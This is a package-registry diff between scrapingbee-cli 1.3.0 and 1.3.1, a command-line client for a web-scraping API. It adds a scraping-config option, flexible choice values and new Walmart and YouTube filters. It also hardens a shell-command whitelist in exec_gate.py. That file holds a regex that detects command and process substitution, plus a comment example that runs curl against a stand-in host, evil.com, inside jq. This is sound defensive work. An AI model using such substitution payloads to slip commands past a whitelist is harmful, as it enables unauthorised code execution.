scrapingbee-cli 1.3.0__tar.gz → 1.3.1__tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (35)
  1. {scrapingbee_cli-1.3.0/src/scrapingbee_cli.egg-info → scrapingbee_cli-1.3.1}/PKG-INFO +5 -2
  2. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/README.md +4 -1
  3. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/pyproject.toml +1 -1
  4. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/__init__.py +1 -1
  5. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/cli_utils.py +19 -0
  6. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/client.py +8 -0
  7. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/amazon.py +2 -1
  8. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/crawl.py +10 -0
  9. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/google.py +2 -1
  10. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/scrape.py +8 -0
  11. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/walmart.py +19 -3
  12. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/youtube.py +9 -4
  13. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/exec_gate.py +50 -5
  14. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1/src/scrapingbee_cli.egg-info}/PKG-INFO +5 -2
  15. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/LICENSE +0 -0
  16. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/setup.cfg +0 -0
  17. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/audit.py +0 -0
  18. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/batch.py +0 -0
  19. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/cli.py +0 -0
  20. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/__init__.py +0 -0
  21. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/auth.py +0 -0
  22. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/chatgpt.py +0 -0
  23. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/export.py +0 -0
  24. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/fast_search.py +0 -0
  25. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/schedule.py +0 -0
  26. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/unsafe.py +0 -0
  27. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/usage.py +0 -0
  28. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/config.py +0 -0
  29. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/crawl.py +0 -0
  30. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/credits.py +0 -0
  31. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli.egg-info/SOURCES.txt +0 -0
  32. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli.egg-info/dependency_links.txt +0 -0
  33. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli.egg-info/entry_points.txt +0 -0
  34. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli.egg-info/requires.txt +0 -0
  35. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli.egg-info/top_level.txt +0 -0
@@ -1,6 +1,6 @@
1
1
  Metadata-Version: 2.4
2
2
  Name: scrapingbee-cli
3
- Version: 1.3.0
3
+ Version: 1.3.1
4
4
  Summary: Command-line client for the ScrapingBee API: scrape pages (single or batch), crawl sites, check usage/credits, and use Google Search, Fast Search, Amazon, Walmart, YouTube, and ChatGPT from the terminal.
5
5
  Author: ScrapingBee
6
6
  License-Expression: MIT
@@ -81,7 +81,9 @@ scrapingbee [command] [arguments] [options]
81
81
  - **`scrapingbee --help`** – List all commands.
82
82
  - **`scrapingbee [command] --help`** – Options and parameters for that command.
83
83
 
84
- **Options are per-command.** Each command has its own set of options — run `scrapingbee [command] --help` to see them. Common options across batch-capable commands include `--output-file`, `--output-dir`, `--input-file`, `--input-column`, `--concurrency`, `--output-format`, `--retries`, `--backoff`, `--resume`, `--update-csv`, `--no-progress`, `--extract-field`, `--fields`, `--deduplicate`, `--sample`, `--post-process`, `--on-complete`, and `--verbose`. For details, see the [documentation](https://www.scrapingbee.com/documentation/).
84
+ **Options are per-command.** Each command has its own set of options — run `scrapingbee [command] --help` to see them. Common options across batch-capable commands include `--output-file`, `--output-dir`, `--input-file`, `--input-column`, `--concurrency`, `--output-format`, `--retries`, `--backoff`, `--resume`, `--update-csv`, `--no-progress`, `--extract-field`, `--fields`, `--deduplicate`, `--sample`, `--post-process`, `--on-complete`, `--scraping-config`, and `--verbose`. For details, see the [documentation](https://www.scrapingbee.com/documentation/).
85
+
86
+ **Parameter values:** Choice parameters accept both hyphens and underscores interchangeably (e.g. `--sort-by price-low` and `--sort-by price_low` both work).
85
87
 
86
88
  ### Commands
87
89
 
@@ -117,6 +119,7 @@ scrapingbee [command] [arguments] [options]
117
119
  - **Scheduling:** `scrapingbee schedule --every 1d --name prices scrape --input-file products.csv --update-csv` registers a cron job. Use `--list`, `--stop NAME`, or `--stop all`.
118
120
  - **Deduplication & sampling:** `--deduplicate` removes duplicate URLs; `--sample 100` processes only 100 random items.
119
121
  - **RAG chunking:** `scrape --chunk-size 500 --chunk-overlap 50 --return-page-markdown true` outputs NDJSON chunks ready for vector DB ingestion.
122
+ - **Scraping configurations:** `--scraping-config "My-Config"` applies a pre-saved configuration from your ScrapingBee dashboard. Inline options override config settings. Create configurations in the [request builder](https://app.scrapingbee.com/).
120
123
 
121
124
  ### Examples
122
125
 
@@ -44,7 +44,9 @@ scrapingbee [command] [arguments] [options]
44
44
  - **`scrapingbee --help`** – List all commands.
45
45
  - **`scrapingbee [command] --help`** – Options and parameters for that command.
46
46
 
47
- **Options are per-command.** Each command has its own set of options — run `scrapingbee [command] --help` to see them. Common options across batch-capable commands include `--output-file`, `--output-dir`, `--input-file`, `--input-column`, `--concurrency`, `--output-format`, `--retries`, `--backoff`, `--resume`, `--update-csv`, `--no-progress`, `--extract-field`, `--fields`, `--deduplicate`, `--sample`, `--post-process`, `--on-complete`, and `--verbose`. For details, see the [documentation](https://www.scrapingbee.com/documentation/).
47
+ **Options are per-command.** Each command has its own set of options — run `scrapingbee [command] --help` to see them. Common options across batch-capable commands include `--output-file`, `--output-dir`, `--input-file`, `--input-column`, `--concurrency`, `--output-format`, `--retries`, `--backoff`, `--resume`, `--update-csv`, `--no-progress`, `--extract-field`, `--fields`, `--deduplicate`, `--sample`, `--post-process`, `--on-complete`, `--scraping-config`, and `--verbose`. For details, see the [documentation](https://www.scrapingbee.com/documentation/).
48
+
49
+ **Parameter values:** Choice parameters accept both hyphens and underscores interchangeably (e.g. `--sort-by price-low` and `--sort-by price_low` both work).
48
50
 
49
51
  ### Commands
50
52
 
@@ -80,6 +82,7 @@ scrapingbee [command] [arguments] [options]
80
82
  - **Scheduling:** `scrapingbee schedule --every 1d --name prices scrape --input-file products.csv --update-csv` registers a cron job. Use `--list`, `--stop NAME`, or `--stop all`.
81
83
  - **Deduplication & sampling:** `--deduplicate` removes duplicate URLs; `--sample 100` processes only 100 random items.
82
84
  - **RAG chunking:** `scrape --chunk-size 500 --chunk-overlap 50 --return-page-markdown true` outputs NDJSON chunks ready for vector DB ingestion.
85
+ - **Scraping configurations:** `--scraping-config "My-Config"` applies a pre-saved configuration from your ScrapingBee dashboard. Inline options override config settings. Create configurations in the [request builder](https://app.scrapingbee.com/).
83
86
 
84
87
  ### Examples
85
88
 
@@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta"
4
4
 
5
5
  [project]
6
6
  name = "scrapingbee-cli"
7
- version = "1.3.0"
7
+ version = "1.3.1"
8
8
  description = "Command-line client for the ScrapingBee API: scrape pages (single or batch), crawl sites, check usage/credits, and use Google Search, Fast Search, Amazon, Walmart, YouTube, and ChatGPT from the terminal."
9
9
  readme = "README.md"
10
10
  license = "MIT"
@@ -3,7 +3,7 @@
3
3
  import platform
4
4
  import sys
5
5
 
6
- __version__ = "1.3.0"
6
+ __version__ = "1.3.1"
7
7
 
8
8
 
9
9
  def user_agent() -> str:
@@ -9,6 +9,23 @@ from typing import Any
  import click


+ class NormalizedChoice(click.Choice):
+     """Choice type that accepts both hyphens and underscores.
+
+     Automatically converts underscores to hyphens before validation,
+     allowing users to use either format interchangeably.
+     Example: both --sort-by price-low and --sort-by price_low work.
+     """
+
+     def convert(self, value: str, param: Any, ctx: Any) -> str:
+         """Convert underscores to hyphens before validation."""
+         if value is not None:
+             normalized = value.replace("_", "-")
+         else:
+             normalized = value
+         return super().convert(normalized, param, ctx)
+
+
  def _output_options(f: Any) -> Any:
      """Output + Retry options (for commands without batch support)."""
  f = click.option(
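The normalization done by `NormalizedChoice.convert` can be tried without click. The sketch below is a stdlib `argparse` analog, not the package's implementation: `build_parser` and `normalize` are hypothetical names, the lowercasing step is an assumption standing in for `case_sensitive=False`, and the choice list is copied from `WALMART_SORT_BY` elsewhere in this diff. It relies on argparse applying `type` before it checks `choices`.

```python
import argparse

# Copied from WALMART_SORT_BY in this diff.
SORT_BY = ["best-match", "price-low", "price-high", "best-seller"]


def normalize(value: str) -> str:
    """Map underscores to hyphens (and lowercase) before validation."""
    return value.replace("_", "-").lower()


def build_parser() -> argparse.ArgumentParser:
    # Hypothetical parser for illustration; the real CLI is built with click.
    parser = argparse.ArgumentParser(prog="walmart-search-sketch")
    # argparse runs `type` first, then checks the result against `choices`.
    parser.add_argument("--sort-by", type=normalize, choices=SORT_BY, default=None)
    return parser


if __name__ == "__main__":
    parser = build_parser()
    for raw in ("price-low", "price_low", "Best_Seller"):
        print(raw, "->", parser.parse_args(["--sort-by", raw]).sort_by)
```

Values outside the list are still rejected after normalization, so the accepted set does not widen; only its spelling becomes more forgiving.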
@@ -385,6 +402,7 @@ def build_scrape_kwargs(
385
402
  custom_google: str | None = None,
386
403
  transparent_status_code: str | None = None,
387
404
  body: str | None = None,
405
+ scraping_config: str | None = None,
388
406
  ) -> dict[str, Any]:
389
407
  """Build kwargs for Client.scrape() from scrape command options.
390
408
  Single source of parse_bool for bool-like opts."""
@@ -424,6 +442,7 @@ def build_scrape_kwargs(
424
442
  "custom_google": parse_bool(custom_google),
425
443
  "transparent_status_code": parse_bool(transparent_status_code),
426
444
  "body": body,
445
+ "scraping_config": scraping_config,
427
446
  }
428
447
 
429
448
 
@@ -177,6 +177,7 @@ class Client:
177
177
  custom_google: bool | None = None,
178
178
  transparent_status_code: bool | None = None,
179
179
  body: str | None = None,
180
+ scraping_config: str | None = None,
180
181
  retries: int = 3,
181
182
  backoff: float = 2.0,
182
183
  **kwargs: Any,
@@ -217,6 +218,7 @@ class Client:
217
218
  ("device", device),
218
219
  ("custom_google", self._bool(custom_google)),
219
220
  ("transparent_status_code", self._bool(transparent_status_code)),
221
+ ("scraping_config", scraping_config),
220
222
  ]:
221
223
  if v is not None:
222
224
  params[k] = str(v) if not isinstance(v, str) else v
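The loop in this hunk forwards only the options that were actually set, which is why appending `("scraping_config", scraping_config)` to the list is enough to pass the new option through. A minimal sketch of that pattern, assuming a standalone helper (`build_params` is a hypothetical name, not a method of `Client`, and the sample values are illustrative):

```python
from typing import Any


def build_params(pairs: list[tuple[str, Any]]) -> dict[str, str]:
    """Keep only the options that were set, stringifying non-string values."""
    params: dict[str, str] = {}
    for key, value in pairs:
        if value is not None:
            params[key] = value if isinstance(value, str) else str(value)
    return params


if __name__ == "__main__":
    print(build_params([
        ("device", None),                  # unset: omitted from the request
        ("scraping_config", "My-Config"),  # set: forwarded unchanged
        ("wait", 1000),                    # non-string: converted with str()
    ]))
```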
@@ -415,6 +417,7 @@ class Client:
415
417
  async def walmart_search(
416
418
  self,
417
419
  query: str,
420
+ start_page: int | None = None,
418
421
  min_price: int | None = None,
419
422
  max_price: int | None = None,
420
423
  sort_by: str | None = None,
@@ -432,6 +435,7 @@ class Client:
432
435
  ) -> tuple[bytes, dict, int]:
433
436
  params = {
434
437
  "query": query,
438
+ "start_page": start_page if start_page is not None else None,
435
439
  "min_price": min_price if min_price is not None else None,
436
440
  "max_price": max_price if max_price is not None else None,
437
441
  "sort_by": sort_by,
@@ -455,6 +459,7 @@ class Client:
455
459
  async def walmart_product(
456
460
  self,
457
461
  product_id: str,
462
+ device: str | None = None,
458
463
  domain: str | None = None,
459
464
  delivery_zip: str | None = None,
460
465
  store_id: str | None = None,
@@ -466,6 +471,7 @@ class Client:
466
471
  ) -> tuple[bytes, dict, int]:
467
472
  params = {
468
473
  "product_id": product_id,
474
+ "device": device,
469
475
  "domain": domain,
470
476
  "delivery_zip": delivery_zip,
471
477
  "store_id": store_id,
@@ -497,6 +503,7 @@ class Client:
497
503
  hdr: bool | None = None,
498
504
  location: bool | None = None,
499
505
  vr180: bool | None = None,
506
+ purchased: bool | None = None,
500
507
  retries: int = 3,
501
508
  backoff: float = 2.0,
502
509
  ) -> tuple[bytes, dict, int]:
@@ -516,6 +523,7 @@ class Client:
516
523
  "hdr": self._bool(hdr),
517
524
  "location": self._bool(location),
518
525
  "vr180": self._bool(vr180),
526
+ "purchased": self._bool(purchased),
519
527
  }
520
528
  return await self._get_with_retry(
521
529
  "/youtube/search",
@@ -17,6 +17,7 @@ from ..batch import (
17
17
  )
18
18
  from ..cli_utils import (
19
19
  DEVICE_DESKTOP_MOBILE_TABLET,
20
+ NormalizedChoice,
20
21
  _batch_options,
21
22
  _validate_page,
22
23
  check_api_response,
@@ -191,7 +192,7 @@ def amazon_product_cmd(
191
192
  @optgroup.option("--pages", type=int, default=None, help="Number of pages to fetch.")
192
193
  @optgroup.option(
193
194
  "--sort-by",
194
- type=click.Choice(AMAZON_SORT_BY, case_sensitive=False),
195
+ type=NormalizedChoice(AMAZON_SORT_BY, case_sensitive=False),
195
196
  default=None,
196
197
  help="Sort order.",
197
198
  )
@@ -59,6 +59,7 @@ def _crawl_build_params(
59
59
  device: str | None,
60
60
  custom_google: str | None,
61
61
  transparent_status_code: str | None,
62
+ scraping_config: str | None = None,
62
63
  ) -> dict[str, str]:
63
64
  """Build ScrapingBee API params dict from crawl options (quick-crawl URL mode)."""
64
65
  kwargs = build_scrape_kwargs(
@@ -97,6 +98,7 @@ def _crawl_build_params(
97
98
  custom_google=custom_google,
98
99
  transparent_status_code=transparent_status_code,
99
100
  body=None,
101
+ scraping_config=scraping_config,
100
102
  )
101
103
  return scrape_kwargs_to_api_params(kwargs)
102
104
 
@@ -117,6 +119,12 @@ def _crawl_build_params(
117
119
  default=None,
118
120
  help="Path to Scrapy project. Spider mode only.",
119
121
  )
122
+ @click.option(
123
+ "--scraping-config",
124
+ type=str,
125
+ default=None,
126
+ help="Apply a pre-saved scraping configuration by name. Create configs in the ScrapingBee dashboard. Inline options override config settings.",
127
+ )
120
128
  @optgroup.group("Rendering", help="JavaScript rendering and viewport options")
121
129
  @optgroup.option(
122
130
  "--render-js",
@@ -323,6 +331,7 @@ def crawl_cmd(
323
331
  target: tuple[str, ...],
324
332
  from_sitemap: str | None,
325
333
  project: str | None,
334
+ scraping_config: str | None,
326
335
  render_js: str | None,
327
336
  js_scenario: str | None,
328
337
  wait: int | None,
@@ -467,6 +476,7 @@ def crawl_cmd(
467
476
  device=device,
468
477
  custom_google=custom_google,
469
478
  transparent_status_code=transparent_status_code,
479
+ scraping_config=scraping_config,
470
480
  )
471
481
  except ValueError as e:
472
482
  click.echo(str(e), err=True)
@@ -17,6 +17,7 @@ from ..batch import (
17
17
  )
18
18
  from ..cli_utils import (
19
19
  DEVICE_DESKTOP_MOBILE,
20
+ NormalizedChoice,
20
21
  _batch_options,
21
22
  _validate_page,
22
23
  check_api_response,
@@ -56,7 +57,7 @@ def _warn_empty_organic(data: bytes, search_type: str | None) -> None:
56
57
  @optgroup.group("Search", help="Search type, locale, and pagination")
57
58
  @optgroup.option(
58
59
  "--search-type",
59
- type=click.Choice(
60
+ type=NormalizedChoice(
60
61
  ["classic", "news", "maps", "lens", "shopping", "images", "ai-mode"],
61
62
  case_sensitive=False,
62
63
  ),
@@ -84,6 +84,12 @@ SCRAPE_PRESETS = (
84
84
  default=None,
85
85
  help="Apply a predefined set of options. Preset only sets options you did not set. See --help for list.",
86
86
  )
87
+ @click.option(
88
+ "--scraping-config",
89
+ type=str,
90
+ default=None,
91
+ help="Apply a pre-saved scraping configuration by name. Create configs in the ScrapingBee dashboard. Inline options override config settings.",
92
+ )
87
93
  @click.option(
88
94
  "--force-extension",
89
95
  type=str,
@@ -308,6 +314,7 @@ def scrape_cmd(
308
314
  obj: dict,
309
315
  url: str | None,
310
316
  preset: str | None,
317
+ scraping_config: str | None,
311
318
  force_extension: str | None,
312
319
  render_js: str | None,
313
320
  js_scenario: str | None,
@@ -467,6 +474,7 @@ def scrape_cmd(
467
474
  custom_google=custom_google,
468
475
  transparent_status_code=transparent_status_code,
469
476
  body=body,
477
+ scraping_config=scraping_config,
470
478
  )
471
479
  except ValueError as e:
472
480
  click.echo(str(e), err=True)
@@ -17,7 +17,9 @@ from ..batch import (
17
17
  )
18
18
  from ..cli_utils import (
19
19
  DEVICE_DESKTOP_MOBILE_TABLET,
20
+ NormalizedChoice,
20
21
  _batch_options,
22
+ _validate_page,
21
23
  _validate_price_range,
22
24
  check_api_response,
23
25
  norm_val,
@@ -34,12 +36,13 @@ WALMART_SORT_BY = ["best-match", "price-low", "price-high", "best-seller"]
34
36
 
35
37
  @click.command("walmart-search")
36
38
  @click.argument("query", required=False)
37
- @optgroup.group("Filters", help="Price and sort")
39
+ @optgroup.group("Pagination & filters", help="Pages, price, and sort")
40
+ @optgroup.option("--start-page", type=int, default=None, help="Starting page number.")
38
41
  @optgroup.option("--min-price", type=int, default=None, help="Minimum price filter (integer).")
39
42
  @optgroup.option("--max-price", type=int, default=None, help="Maximum price filter (integer).")
40
43
  @optgroup.option(
41
44
  "--sort-by",
42
- type=click.Choice(WALMART_SORT_BY, case_sensitive=False),
45
+ type=NormalizedChoice(WALMART_SORT_BY, case_sensitive=False),
43
46
  default=None,
44
47
  help="Sort order.",
45
48
  )
@@ -74,6 +77,7 @@ WALMART_SORT_BY = ["best-match", "price-low", "price-high", "best-seller"]
74
77
  def walmart_search_cmd(
75
78
  obj: dict,
76
79
  query: str | None,
80
+ start_page: int | None,
77
81
  min_price: int | None,
78
82
  max_price: int | None,
79
83
  sort_by: str | None,
@@ -96,6 +100,7 @@ def walmart_search_cmd(
96
100
  except ValueError as e:
97
101
  click.echo(str(e), err=True)
98
102
  raise SystemExit(1)
103
+ _validate_page(start_page, "start_page")
99
104
  _validate_price_range(min_price, max_price)
100
105
 
101
106
  if input_file:
@@ -123,6 +128,7 @@ def walmart_search_cmd(
123
128
  async def api_call(client, q):
124
129
  return await client.walmart_search(
125
130
  q,
131
+ start_page=start_page,
126
132
  min_price=min_price,
127
133
  max_price=max_price,
128
134
  sort_by=norm_val(sort_by),
@@ -165,6 +171,7 @@ def walmart_search_cmd(
165
171
  async with Client(key, BASE_URL) as client:
166
172
  data, headers, status_code = await client.walmart_search(
167
173
  query,
174
+ start_page=start_page,
168
175
  min_price=min_price,
169
176
  max_price=max_price,
170
177
  sort_by=norm_val(sort_by),
@@ -200,7 +207,13 @@ def walmart_search_cmd(
200
207
 
201
208
  @click.command("walmart-product")
202
209
  @click.argument("product_id", required=False)
203
- @optgroup.group("Locale", help="Domain and delivery location")
210
+ @optgroup.group("Device & locale", help="Device, domain, and delivery location")
211
+ @optgroup.option(
212
+ "--device",
213
+ type=click.Choice(DEVICE_DESKTOP_MOBILE_TABLET, case_sensitive=False),
214
+ default=None,
215
+ help="Device: desktop, mobile, or tablet.",
216
+ )
204
217
  @optgroup.option("--domain", type=str, default=None, help="Walmart domain.")
205
218
  @optgroup.option("--delivery-zip", type=str, default=None, help="Delivery ZIP code.")
206
219
  @optgroup.option("--store-id", type=str, default=None, help="Walmart store ID.")
@@ -213,6 +226,7 @@ def walmart_search_cmd(
213
226
  def walmart_product_cmd(
214
227
  obj: dict,
215
228
  product_id: str | None,
229
+ device: str | None,
216
230
  domain: str | None,
217
231
  delivery_zip: str | None,
218
232
  store_id: str | None,
@@ -255,6 +269,7 @@ def walmart_product_cmd(
255
269
  async def api_call(client, pid):
256
270
  return await client.walmart_product(
257
271
  pid,
272
+ device=device,
258
273
  domain=domain,
259
274
  delivery_zip=delivery_zip,
260
275
  store_id=store_id,
@@ -291,6 +306,7 @@ def walmart_product_cmd(
291
306
  async with Client(key, BASE_URL) as client:
292
307
  data, headers, status_code = await client.walmart_product(
293
308
  product_id,
309
+ device=device,
294
310
  domain=domain,
295
311
  delivery_zip=delivery_zip,
296
312
  store_id=store_id,
@@ -17,6 +17,7 @@ from ..batch import (
17
17
  validate_batch_run,
18
18
  )
19
19
  from ..cli_utils import (
20
+ NormalizedChoice,
20
21
  _batch_options,
21
22
  check_api_response,
22
23
  norm_val,
@@ -117,26 +118,26 @@ YOUTUBE_SORT_BY = ["relevance", "rating", "view-count", "upload-date"]
117
118
  @optgroup.group("Filters", help="Upload date, type, duration, sort")
118
119
  @optgroup.option(
119
120
  "--upload-date",
120
- type=click.Choice(YOUTUBE_UPLOAD_DATE, case_sensitive=False),
121
+ type=NormalizedChoice(YOUTUBE_UPLOAD_DATE, case_sensitive=False),
121
122
  default=None,
122
123
  help="Filter by upload date.",
123
124
  )
124
125
  @optgroup.option(
125
126
  "--type",
126
127
  "type_",
127
- type=click.Choice(YOUTUBE_TYPE, case_sensitive=False),
128
+ type=NormalizedChoice(YOUTUBE_TYPE, case_sensitive=False),
128
129
  default=None,
129
130
  help="Result type.",
130
131
  )
131
132
  @optgroup.option(
132
133
  "--duration",
133
- type=click.Choice(YOUTUBE_DURATION, case_sensitive=False),
134
+ type=NormalizedChoice(YOUTUBE_DURATION, case_sensitive=False),
134
135
  default=None,
135
136
  help="Duration: short (<4 min), medium (4-20 min), long (>20 min).",
136
137
  )
137
138
  @optgroup.option(
138
139
  "--sort-by",
139
- type=click.Choice(YOUTUBE_SORT_BY, case_sensitive=False),
140
+ type=NormalizedChoice(YOUTUBE_SORT_BY, case_sensitive=False),
140
141
  default=None,
141
142
  help="Sort order.",
142
143
  )
@@ -153,6 +154,7 @@ YOUTUBE_SORT_BY = ["relevance", "rating", "view-count", "upload-date"]
153
154
  @optgroup.option("--hdr", type=str, default=None, help="HDR videos only (true/false).")
154
155
  @optgroup.option("--location", type=str, default=None, help="With location (true/false).")
155
156
  @optgroup.option("--vr180", type=str, default=None, help="VR180 only (true/false).")
157
+ @optgroup.option("--purchased", type=str, default=None, help="Purchased only (true/false).")
156
158
  @_batch_options
157
159
  @click.pass_obj
158
160
  def youtube_search_cmd(
@@ -172,6 +174,7 @@ def youtube_search_cmd(
172
174
  hdr: str | None,
173
175
  location: str | None,
174
176
  vr180: str | None,
177
+ purchased: str | None,
175
178
  **kwargs,
176
179
  ) -> None:
177
180
  """Search YouTube videos."""
@@ -223,6 +226,7 @@ def youtube_search_cmd(
223
226
  hdr=parse_bool(hdr),
224
227
  location=parse_bool(location),
225
228
  vr180=parse_bool(vr180),
229
+ purchased=parse_bool(purchased),
226
230
  retries=obj.get("retries", 3) or 3,
227
231
  backoff=obj.get("backoff", 2.0) or 2.0,
228
232
  )
@@ -268,6 +272,7 @@ def youtube_search_cmd(
268
272
  hdr=parse_bool(hdr),
269
273
  location=parse_bool(location),
270
274
  vr180=parse_bool(vr180),
275
+ purchased=parse_bool(purchased),
271
276
  retries=obj.get("retries", 3) or 3,
272
277
  backoff=obj.get("backoff", 2.0) or 2.0,
273
278
  )
@@ -10,6 +10,7 @@ All three features are disabled by default. To enable, ALL of these must be true
10
10
  from __future__ import annotations
11
11
 
12
12
  import os
13
+ import re
13
14
 
14
15
  import click
15
16
 
@@ -59,20 +60,64 @@ def get_whitelist() -> list[str]:
      return [cmd.strip() for cmd in raw.split(",") if cmd.strip()]


- def is_command_whitelisted(cmd: str) -> bool:
-     """Check if a command matches the whitelist (starts with an allowed prefix)."""
-     cmd_stripped = cmd.strip()
+ # Patterns that bypass whitelist validation by executing commands
+ # inside what looks like a single whitelisted command.
+ # Example: jq "$(curl evil.com)" — one segment starting with "jq",
+ # but $() executes curl before jq even runs.
+ _SUBSTITUTION_PATTERNS = re.compile(
+     r"\$\(" # command substitution $(...)
+     r"|`" # backtick command substitution
+     r"|\$\{" # variable expansion ${...} (can embed commands)
+     r"|<\(" # process substitution <(...)
+     r"|>\(" # process substitution >(...)
+ )
+
+
+ def _split_shell_segments(cmd: str) -> list[str]:
+     """Split a shell command on pipe and chaining operators.
+
+     Returns the individual command segments from a chain like:
+     'jq .title | head -1 && echo done' → ['jq .title', 'head -1', 'echo done']
+     """
+     # Split on ||, &&, |, ;, &, and newlines — longest operators first
+     parts = re.split(r"\|\||&&|[|;&\n]", cmd)
+     return [p.strip() for p in parts if p.strip()]
+
+
+ def _is_single_segment_whitelisted(segment: str) -> bool:
+     """Check if a single command segment matches the whitelist."""
      for allowed in get_whitelist():
-         if cmd_stripped.startswith(allowed):
+         if segment.startswith(allowed):
              return True
      return False


+ def is_command_whitelisted(cmd: str) -> bool:
+     """Check if a command is safe to execute against the whitelist.
+
+     Validates ALL segments in a piped/chained command, not just the first.
+     Also blocks command/process substitution which can bypass segment validation.
+     """
+     cmd_stripped = cmd.strip()
+
+     # Block substitution patterns that bypass whitelist validation
+     if _SUBSTITUTION_PATTERNS.search(cmd_stripped):
+         return False
+
+     # Validate every segment in the command chain
+     segments = _split_shell_segments(cmd_stripped)
+     if not segments:
+         return False
+     return all(_is_single_segment_whitelisted(seg) for seg in segments)
+
+
  def require_exec(feature_name: str, cmd: str | None = None) -> None:
      """Gate check — call before any shell execution.

      Required: SCRAPINGBEE_ALLOW_EXEC=1 + SCRAPINGBEE_UNSAFE_VERIFIED=1
      Optional: SCRAPINGBEE_ALLOWED_COMMANDS — if set, command must match whitelist.
+     Blocks shell injection patterns (pipes to non-whitelisted commands,
+     command substitution, backticks, process substitution).
      """
      if not is_exec_enabled():
          click.echo(_VAGUE_ERROR, err=True)
@@ -81,7 +126,7 @@ def require_exec(feature_name: str, cmd: str | None = None) -> None:
81
126
  # Whitelist is optional — if set, enforce it
82
127
  if cmd is not None and is_whitelist_enabled() and not is_command_whitelisted(cmd):
83
128
  click.echo(
84
- f"Command not in whitelist: {cmd.split()[0] if cmd.split() else cmd}",
129
+ "Command blocked: contains non-whitelisted command or shell injection pattern.",
85
130
  err=True,
86
131
  )
87
132
  raise SystemExit(1)
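The whitelist check added to `exec_gate.py` can be exercised in isolation. The sketch below reuses the regular expressions from the diff but takes the whitelist as an argument instead of reading it through `get_whitelist()`; `is_allowed`, the constant names, and the sample whitelist are illustrative assumptions, not part of the package.

```python
import re

# Same alternatives as _SUBSTITUTION_PATTERNS in the diff.
SUBSTITUTION = re.compile(r"\$\(|`|\$\{|<\(|>\(")
# Same separators as _split_shell_segments: ||, &&, |, ;, & and newlines.
SEPARATORS = re.compile(r"\|\||&&|[|;&\n]")


def is_allowed(cmd: str, whitelist: list[str]) -> bool:
    """Return True only if every segment starts with a whitelisted prefix."""
    cmd = cmd.strip()
    # Reject command, variable, and process substitution outright.
    if SUBSTITUTION.search(cmd):
        return False
    segments = [s.strip() for s in SEPARATORS.split(cmd) if s.strip()]
    if not segments:
        return False
    return all(any(seg.startswith(a) for a in whitelist) for seg in segments)


if __name__ == "__main__":
    allowed = ["jq", "head"]  # hypothetical whitelist
    for cmd in (
        "jq .title | head -1",
        "jq .title | curl evil.com",
        'jq "$(curl evil.com)"',
        "jqx --anything",
        "jq '.a | .b'",
    ):
        print(f"{cmd!r}: {is_allowed(cmd, allowed)}")
```

Two properties follow from the code as written. Matching is by prefix (`startswith`), so an entry such as `jq` also admits any command whose name merely begins with `jq`. The split does not understand quoting, so a pipe inside a quoted argument is treated as a separator and the text after it must also match the whitelist.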
@@ -1,6 +1,6 @@
1
1
  Metadata-Version: 2.4
2
2
  Name: scrapingbee-cli
3
- Version: 1.3.0
3
+ Version: 1.3.1
4
4
  Summary: Command-line client for the ScrapingBee API: scrape pages (single or batch), crawl sites, check usage/credits, and use Google Search, Fast Search, Amazon, Walmart, YouTube, and ChatGPT from the terminal.
5
5
  Author: ScrapingBee
6
6
  License-Expression: MIT
@@ -81,7 +81,9 @@ scrapingbee [command] [arguments] [options]
81
81
  - **`scrapingbee --help`** – List all commands.
82
82
  - **`scrapingbee [command] --help`** – Options and parameters for that command.
83
83
 
84
